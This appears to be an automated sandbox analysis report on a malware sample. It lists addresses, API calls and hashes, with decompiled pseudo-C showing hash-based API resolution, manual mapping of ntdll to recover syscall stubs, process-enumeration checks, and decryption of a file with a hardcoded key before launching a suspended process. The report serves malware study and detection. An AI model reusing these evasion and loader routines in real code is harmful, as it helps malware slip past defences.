0x73351c0c
0x73351c12
0x73351c16
0x00000000
0x73351c16
0x73351c02
0x73351c02
0x73351c03
0x00000000
0x00000000
0x73351c05
0x73351c06
0x00000000
0x00000000
0x00000000
0x73351c06
0x73351b96
0x73351b97
0x73351ba0
0x73351ba3
0x73351bb0
0x73351bb0
0x73351ba5
0x73351ba5
0x73351c7e
0x73351c81
0x73351c84
0x73351cf6
0x73351cfa
0x73351adc
0x00000000
0x73351adc
0x00000000
0x73351cfa
0x73351b94
0x73351b00
0x73351b03
0x73351b66
0x73351b69
0x73351b7a
0x73351b7a
0x73351b7d
0x73351c89
0x73351c8c
0x73351c8c
0x73351c8e
0x73352033
0x73352045
0x73352045
0x73352047
0x00000000
0x00000000
0x73352037
0x73352038
0x7335203b
0x7335203e
0x733520ba
0x733520c1
0x733520c6
0x733520c9
0x73351cf2
0x73351cf2
0x73351cf2
0x73351cf3
0x00000000
0x73351cf3
0x73352040
0x73352042
0x73352042
0x73352049
0x7335204b
0x733520ae
0x73351ce7
0x73351cea
0x73351ced
0x73351cf0
0x73351cf0
0x00000000
0x73351cf0
0x7335204d
0x7335204f
0x73352055
0x73352055
0x73352057
0x7335205a
0x7335206d
0x7335206d
0x73352070
0x73352073
0x00000000
0x00000000
0x73352075
0x73352078
0x00000000
0x00000000
0x7335207a
0x73352081
0x73352081
0x73352087
0x7335208a
0x733520a6
0x7335208c
0x73352095
0x73352098
0x73352098
0x00000000
0x7335208a
0x7335205c
0x7335205f
0x73352062
0x00000000
0x00000000
0x73352064
0x00000000
0x73352064
0x73352051
0x73352053
0x00000000
0x00000000
0x00000000
0x73352053
0x73351c94
0x73351c94
0x73351c95
0x73351dde
0x73351dde
0x73351de5
0x73351de8
0x00000000
0x00000000
0x73351df5
0x00000000
0x73351fdb
0x73351fde
0x73351fe1
0x73351fe1
0x73351fe2
0x73351fe5
0x73351fe7
0x73351fe9
0x00000000
0x00000000
0x73351feb
0x73351feb
0x73351fee
0x73352000
0x73352003
0x73352006
0x7335200c
0x00000000
0x7335200c
0x73351ff0
0x73351ff0
0x73351ff2
0x00000000
0x00000000
0x73351ff4
0x73351ff6
0x73351ff8
0x73351ff8
0x73351ff8
0x73351ff9
0x73351ffb
0x73351ffd
0x73351fe1
0x73351fe2
0x73351fe5
0x73351fe7
0x73351fe9
0x00000000
0x00000000
0x00000000
0x73351fe9
0x00000000
0x73351e3c
0x00000000
0x00000000
0x73351e48
0x00000000
0x00000000
0x73351e2f
0x73351e33
0x73351e37
0x00000000
0x00000000
0x73351fad
0x73351fb1
0x00000000
0x00000000
0x73351fb7
0x73351fbf
0x73351fc6
0x73351fce
0x00000000
0x00000000
0x73351f15
0x73351f15
0x00000000
0x00000000
0x73351e51
0x00000000
0x00000000
0x7335202b
0x00000000
0x00000000
0x73351f1d
0x73351f1f
0x73351f1f
0x00000000
0x00000000
0x7335201b
0x00000000
0x00000000
0x7335201f
0x00000000
0x00000000
0x73352027
0x00000000
0x00000000
0x73351f64
0x73351f66
0x73351f66
0x00000000
0x00000000
0x73351f2f
0x73351f31
0x73351f31
0x00000000
0x00000000
0x73351f41
0x73351f43
0x73351f43
0x00000000
0x00000000
0x73351f72
0x73351f74
0x73351f74
0x00000000
0x00000000
0x73351f4c
0x73351f4e
0x73351f4e
0x00000000
0x00000000
0x73351f53
0x00000000
0x00000000
0x73352023
0x7335202d
0x7335202d
0x00000000
0x00000000
0x73351f7d
0x73351f81
0x73351f86
0x73351f89
0x73351f8a
0x73351f8d
0x73351f93
0x73351f93
0x00000000
0x00000000
0x73352013
0x00000000
0x00000000
0x73351f57
0x73351f57
0x00000000
0x00000000
0x73351e58
0x73351e58
0x00000000
0x00000000
0x73351f6b
0x73351f6d
0x73351f6d
0x00000000
0x00000000
0x73351dfc
0x73351e02
0x73351e05
0x73351e07
0x73351e07
0x73351e0a
0x73351e0e
0x73351e1b
0x73351e1d
0x73351e23
0x73351e23
0x73351e23
0x00000000
0x00000000
0x73351f20
0x73351f20
0x73351f22
0x73351f29
0x00000000
0x00000000
0x73351f67
0x73351f67
0x00000000
0x00000000
0x73351f32
0x73351f32
0x73351f34
0x73351f3b
0x00000000
0x00000000
0x73351f44
0x73351f44
0x73351f46
0x00000000
0x00000000
0x73351f75
0x73351f75
0x00000000
0x00000000
0x73351f4f
0x73351f4f
0x00000000
0x00000000
0x73351f9b
0x73351f9f
0x73351fa4
0x73351fa7
0x00000000
0x00000000
0x73351f59
0x73351f59
0x73351f5c
0x73351f5e
0x00000000
0x00000000
0x73351f6e
0x73351f6e
0x73351f77
0x73351f77
0x73351e5a
0x73351e5a
0x73351e5d
0x73351e64
0x73351e66
0x73351e68
0x73351e6f
0x73351e72
0x73351e77
0x73351e79
0x73351e7b
0x73351e7f
0x73351e85
0x73351e8b
0x73351e8b
0x73351e8d
0x73351e8d
0x73351e8e
0x73351e8e
0x73351e92
0x73351e98
0x73351e9a
0x73351e9e
0x73351ea3
0x73351ea3
0x73351ea5
0x73351ea5
0x73351ea8
0x73351eab
0x73351eb4
0x73351eb7
0x73351eba
0x73351eba
0x73351ebc
0x73351ebf
0x73351ec5
0x73351ecb
0x73351ecb
0x73351ecd
0x00000000
0x00000000
0x73351ed3
0x73351ed3
0x73351ed7
0x73351ede
0x73351f02
0x73351f02
0x73351f06
0x73351f08
0x73351f0b
0x73351f0b
0x73351f0e
0x73351f0e
0x00000000
0x73351f06
0x73351ee3
0x73351ee6
0x73351ee6
0x73351eed
0x73351eef
0x73351ef2
0x73351ef9
0x73351efa
0x73351f00
0x73351f00
0x00000000
0x73351f00
0x73351ef4
0x73351ef7
0x00000000
0x00000000
0x00000000
0x73351ef7
0x73351e87
0x73351e89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73351df5
0x73351c9b
0x73351c9b
0x73351c9c
0x73351ddb
0x00000000
0x73351ddb
0x73351ca2
0x73351ca3
0x00000000
0x00000000
0x73351ca9
0x73351cac
0x73351da0
0x73351da0
0x73351da3
0x73351db8
0x73351dba
0x73351dba
0x73351dbb
0x73351dbe
0x73351dc1
0x73351dcd
0x73351dcd
0x73351dcd
0x73351dc3
0x73351dc3
0x73351dc3
0x73351dd3
0x00000000
0x73351dd3
0x73351da5
0x73351da5
0x73351da6
0x73351db4
0x00000000
0x73351db4
0x73351da9
0x73351daa
0x00000000
0x00000000
0x73351db0
0x00000000
0x73351db0
0x73351cb2
0x73351d9c
0x00000000
0x73351d9c
0x73351cb8
0x73351cb8
0x73351cbb
0x73351ce4
0x00000000
0x73351ce4
0x73351cbd
0x73351cbd
0x73351cc0
0x73351cda
0x00000000
0x73351cda
0x73351cc2
0x73351cc2
0x73351cc5
0x73351cd4
0x00000000
0x73351cd4
0x73351cc8
0x73351cc9
0x00000000
0x00000000
0x73351ccb
0x00000000
0x73351b83
0x73351b83
0x73351b86
0x00000000
0x73351b86
0x73351b7d
0x73351b6b
0x73351b6f
0x00000000
0x00000000
0x73351b71
0x73351b74
0x00000000
0x00000000
0x00000000
0x73351b74
0x73351b05
0x73351b08
0x73351b3e
0x73351b41
0x00000000
0x73351b47
0x73351b49
0x73351b4d
0x73351b54
0x73351b5b
0x73351b5e
0x73351b61
0x00000000
0x73351b61
0x73351b41
0x73351b0a
0x73351b0b
0x73351b26
0x73351b29
0x00000000
0x73351b2f
0x73351b2f
0x73351b36
0x73351b39
0x00000000
0x73351b39
0x73351b29
0x73351b10
0x00000000
0x73351b16
0x73351b16
0x73351b1d
0x00000000
0x73351b1d
0x73351b10
0x73351d09
0x73351d0e
0x73351d13
0x73351d17
0x733521c6
0x733521cc
0x73351d29
0x73351d2b
0x73351d2c
0x733520f1
0x733520f1
0x733520f4
0x733520f7
0x73352114
0x7335211a
0x7335211c
0x73352122
0x73352139
0x73352139
0x73352139
0x73352146
0x7335214c
0x7335214f
0x73352155
0x73352157
0x7335215a
0x7335215c
0x73352163
0x73352168
0x7335216b
0x7335216d
0x73352172
0x73352184
0x73352184
0x73352172
0x7335216b
0x7335215a
0x7335218a
0x7335218d
0x73352197
0x7335219f
0x733521ab
0x733521b1
0x733521b4
0x733520e6
0x733520e6
0x00000000
0x733520e6
0x733521ba
0x733521c0
0x733521c0
0x00000000
0x00000000
0x733521c2
0x733521c2
0x733521c2
0x733521c2
0x00000000
0x7335218f
0x7335218f
0x73352195
0x00000000
0x00000000
0x00000000
0x73352195
0x7335218d
0x73352125
0x7335212b
0x7335212d
0x73352133
0x00000000
0x00000000
0x00000000
0x73352133
0x733520f9
0x73352100
0x73352106
0x7335210c
0x00000000
0x7335210c
0x73351d32
0x73351d33
0x733520d0
0x733520d0
0x733520d6
0x733520d9
0x00000000
0x00000000
0x733520e0
0x733520e5
0x00000000
0x733520e5
0x73351d3a
0x00000000
0x00000000
0x73351d40
0x73351d40
0x73351d49
0x73351d4e
0x73351d54
0x00000000
0x00000000
0x73351d5a
0x73351d67
0x73351d6d
0x73351d77
0x73351d7d
0x73351d85
0x73351d95
0x00000000
0x73351d95

APIs

Part of subcall function 73351215: GlobalAlloc.KERNEL32(00000040,73351233,?,733512CF,-7335404B,733511AB,-000000A0), ref: 7335121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 73351BC4
lstrcpyA.KERNEL32(00000008,?), ref: 73351C0C
lstrcpyA.KERNEL32(00000408,?), ref: 73351C16
GlobalFree.KERNEL32 ref: 73351C29
GlobalFree.KERNEL32 ref: 73351D09
GlobalFree.KERNEL32 ref: 73351D0E
GlobalFree.KERNEL32 ref: 73351D13
GlobalFree.KERNEL32 ref: 73351EFA
lstrcpyA.KERNEL32(?,?), ref: 73352098
GetModuleHandleA.KERNEL32(00000008), ref: 73352114
LoadLibraryA.KERNEL32(00000008), ref: 73352125
GetProcAddress.KERNEL32(?,?), ref: 7335217E
lstrlenA.KERNEL32(00000408), ref: 73352198

Memory Dump Source

Source File: 00000009.00000002.270495785.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000009.00000002.270489484.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270502205.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270512499.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 37a8660ae61617b1fdc674c99d44423e2ef0faf7b75e9a5dcff6917590220078
Instruction ID: 56f2f93f515f1b4114771f1fcceab50dde497fd3d80f66ce41fab04e1bece2fe
Opcode Fuzzy Hash: 37a8660ae61617b1fdc674c99d44423e2ef0faf7b75e9a5dcff6917590220078
Instruction Fuzzy Hash: 60226A72D0424A9BDF329FB4C881FAEBBF9BB05315F14462EE196E3280D7795681CB50

Uniqueness

Uniqueness Score: -1.00%

Function 733522F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E733522F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E733512AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E7335123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M7335247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E733512FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E733512FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E73351224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x7335405c =  *0x7335405c +  *0x7335405c;
									__eax = GlobalAlloc(0x40,  *0x7335405c +  *0x7335405c); // executed
									__edi = __eax;
									 *0x7335405c = MultiByteToWideChar(0, 0, __ebx,  *0x7335405c, __edi,  *0x7335405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E733512FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x7335405c;
									__esi = __esi +  *0x73354064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E73351429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E73351224(0x73354034);
					goto L10;
				}
			}

0x73352306
0x7335230a
0x73352315
0x73352315
0x7335231c
0x73352321
0x00000000
0x00000000
0x73352325
0x73352328
0x00000000
0x00000000
0x7335232d
0x73352338
0x73352348
0x7335233f
0x73352341
0x73352357
0x73352357
0x00000000
0x7335232f
0x7335232f
0x73352358
0x7335235c
0x7335235e
0x7335235e
0x73352361
0x73352361
0x73352369
0x7335236c
0x73352373
0x73352377
0x73352446
0x73352447
0x73352452
0x7335247d
0x7335247d
0x73352462
0x7335246e
0x73352464
0x73352464
0x73352464
0x00000000
0x7335237d
0x7335237d
0x00000000
0x73352384
0x00000000
0x00000000
0x7335238d
0x00000000
0x00000000
0x7335239b
0x7335239e
0x00000000
0x00000000
0x733523a7
0x733523ac
0x733523af
0x733523b0
0x00000000
0x00000000
0x733523bd
0x733523c2
0x733523c8
0x733523d7
0x733523e2
0x73352405
0x73352408
0x733523e4
0x733523e8
0x733523ee
0x733523ef
0x733523f2
0x733523f3
0x733523f6
0x733523fd
0x733523fd
0x00000000
0x00000000
0x73352410
0x73352413
0x7335241f
0x73352421
0x00000000
0x00000000
0x73352424
0x73352427
0x73352428
0x7335242f
0x73352436
0x73352439
0x7335243b
0x7335243e
0x00000000
0x00000000
0x7335237d
0x73352377
0x7335234d
0x73352352
0x00000000
0x73352352

APIs

GlobalFree.KERNEL32 ref: 73352447

Part of subcall function 73351224: lstrcpynA.KERNEL32(00000000,?,733512CF,-7335404B,733511AB,-000000A0), ref: 73351234

GlobalAlloc.KERNEL32(00000040,?), ref: 733523C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 733523D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 733523E8
CLSIDFromString.OLE32(00000000,00000000), ref: 733523F6
GlobalFree.KERNEL32 ref: 733523FD

Strings

@u<u, xrefs: 733523F6

Memory Dump Source

Source File: 00000009.00000002.270495785.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000009.00000002.270489484.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270502205.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270512499.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID: @u<u
API String ID: 3730416702-3153514966
Opcode ID: c5d577dbacf8ba8c8ef111689dfc42626c7b35e9dcab9b1930bb0fc6e0f24a63
Instruction ID: 65491e489d803d5a4dc64620a0cfe7f4a0f9c995a0f6aff1c806130d5fd8c1b9
Opcode Fuzzy Hash: c5d577dbacf8ba8c8ef111689dfc42626c7b35e9dcab9b1930bb0fc6e0f24a63
Instruction Fuzzy Hash: 824159B2908309DFE7319F758844F6AB7ECFB40322F24491EF59AC6190D73495858BA1

Uniqueness

Uniqueness Score: -1.00%

Function 100036E7, Relevance: 10.7, APIs: 7, Instructions: 237
fileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E100036E7(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				signed int _t169;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E10004564();
				_v64 = E1000460C(_v20, 0x8a111d91);
				_v68 = E1000460C(_v20, 0x170c1ca1);
				_v52 = E1000460C(_v20, 0xa5f15738);
				_v72 = E1000460C(_v20, 0x433a3842);
				_v56 = E1000460C(_v20, 0xd6eb2188);
				_v60 = E1000460C(_v20, 0x50a26af);
				_v80 = E1000460C(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E10004767(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
								_t213 = _v32;
								_t68 = _t169 + 0x18; // 0x8000018
								_v40 = _v32 + _t68;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E1000457C(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E1000457C(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E1000460C(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											FindCloseChangeNotification(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 100037E9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 100039B6

Memory Dump Source

Source File: 00000009.00000002.270473690.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.270448534.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270459599.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000009.00000002.270466698.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270479747.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
Instruction ID: a4a951dc323091a8e79af4ab7c12a05185e9bd1e1b86be37fe86f9a6bd5a3c6c
Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
Instruction Fuzzy Hash: 1CA11074D00209EFEF11CFE4D985BAEBBB5FF08351F20846AE900BA2A4D7B55A40DB15

Uniqueness

Uniqueness Score: -1.00%

Function 100042A0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E100042A0(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				long _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v140;
				char _v208;
				char _v1248;
				signed int _t124;
				void* _t126;
				void* _t130;
				signed int _t131;
				void* _t132;
				int _t134;
				int _t137;
				signed int _t147;
				void* _t149;
				signed int _t150;
				void* _t152;
				signed int _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t159 = __eflags;
				_t157 = __edx;
				_t156 = __ecx;
				_v20 = _v20 & 0x00000000;
				_v84 = _v84 & 0x00000000;
				_v56 = 0x65;
				_v55 = 0x35;
				_v54 = 0x63;
				_v53 = 0x34;
				_v52 = 0x33;
				_v51 = 0x62;
				_v50 = 0x32;
				_v49 = 0x32;
				_v48 = 0x64;
				_v47 = 0x62;
				_v46 = 0x39;
				_v45 = 0x65;
				_v44 = 0x34;
				_v43 = 0x37;
				_v42 = 0x66;
				_v41 = 0x32;
				_v40 = 0x39;
				_v39 = 0x39;
				_v38 = 0x65;
				_v37 = 0x32;
				_v36 = 0x30;
				_v35 = 0x65;
				_v34 = 0x33;
				_v33 = 0x37;
				_v32 = 0x66;
				_v31 = 0x34;
				_v30 = 0x33;
				_v29 = 0x66;
				_v28 = 0x64;
				_v27 = 0x31;
				_v26 = 0x32;
				_v25 = 0x62;
				_v24 = 0;
				_v16 = _v16 & 0x00000000;
				_v116 = _v116 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = E10004564();
				_v60 = E1000460C(_v8, 0x34cf0bf);
				_v64 = E1000460C(_v8, 0x55e38b1f);
				_v68 = E1000460C(_v8, 0xd1775dc4);
				_v120 = E1000460C(_v8, 0xd6eb2188);
				_v96 = E1000460C(_v8, 0xa2eae210);
				_v124 = E1000460C(_v8, 0xcd8538b2);
				_v72 = E1000460C(_v8, 0x8a111d91);
				_v76 = E1000460C(_v8, 0x170c1ca1);
				_v80 = E1000460C(_v8, 0xa5f15738);
				_v88 = E1000460C(_v8, 0x433a3842);
				_v92 = E1000460C(_v8, 0x2ffe2c64);
				_v112 = 0x2d734193;
				_v108 = 0x63daa681;
				_v104 = 0x26090612;
				_v100 = 0x6f28fae0;
				_t124 = 4;
				_t126 = E100041FD(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
				_t160 = _t126;
				if(_t126 != 0) {
					L4:
					_v60(0x7918);
					L5:
					_v68(0,  &_v1248, 0x103);
					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
					_v20 = _t130;
					if(_v20 != 0xffffffff) {
						_t131 = _v76(_v20, 0);
						_v16 = _t131;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t132;
							__eflags = _v12;
							if(_v12 != 0) {
								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
								__eflags = _t134;
								if(_t134 != 0) {
									_t99 =  &_v56; // 0x65
									E10004001(_v12, _t99, 0x20);
									_t137 = E10003034(_t156, _t157, __eflags, _v12); // executed
									__eflags = _t137;
									if(_t137 != 0) {
										_v60(0xbb8);
										E10003005(_t156,  &_v140, 0x10);
										E10003005(_t156,  &_v208, 0x44);
										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
										__eflags = _t137;
										if(_t137 != 0) {
											_t137 = _v64(0);
										}
									}
									ExitProcess(0);
								}
								return _t134;
							}
							return _t132;
						}
						return _t131;
					}
					return _t130;
				}
				_t147 = 4;
				_t149 = E100041FD(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
				_t161 = _t149;
				if(_t149 != 0) {
					goto L4;
				}
				_t150 = 4;
				_t152 = E100041FD(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
				_t162 = _t152;
				if(_t152 != 0) {
					goto L4;
				}
				_t153 = 4;
				_t155 = E100041FD(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
				if(_t155 == 0) {
					goto L5;
				}
				goto L4;
			}

APIs

Part of subcall function 100041FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 10004242

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000448E

Part of subcall function 100041FD: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10004266

VirtualAlloc.KERNEL32(00000000,000000FF,00003000,00000004), ref: 100044C1
ReadFile.KERNEL32(000000FF,00000000,000000FF,00000000,00000000), ref: 100044E1
ExitProcess.KERNEL32(00000000), ref: 1000455B

Strings

e5c43b22db9e47f299e20e37f43fd12b, xrefs: 100044EC, 100044EF

Memory Dump Source

Source File: 00000009.00000002.270473690.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.270448534.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270459599.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000009.00000002.270466698.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270479747.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile$AllocExitFirstProcessProcess32ReadSnapshotToolhelp32Virtual
String ID: e5c43b22db9e47f299e20e37f43fd12b
API String ID: 1928574196-3844863974
Opcode ID: 9374fa99c5471f6679ac717fa99e6c74e7f1fbc9bbeff08401bbb0a6b160f266
Instruction ID: 58b0c4507ae3875bd35d106dc6ee5680b6bdeeff36dd3e6900c86c7a562481e9
Opcode Fuzzy Hash: 9374fa99c5471f6679ac717fa99e6c74e7f1fbc9bbeff08401bbb0a6b160f266
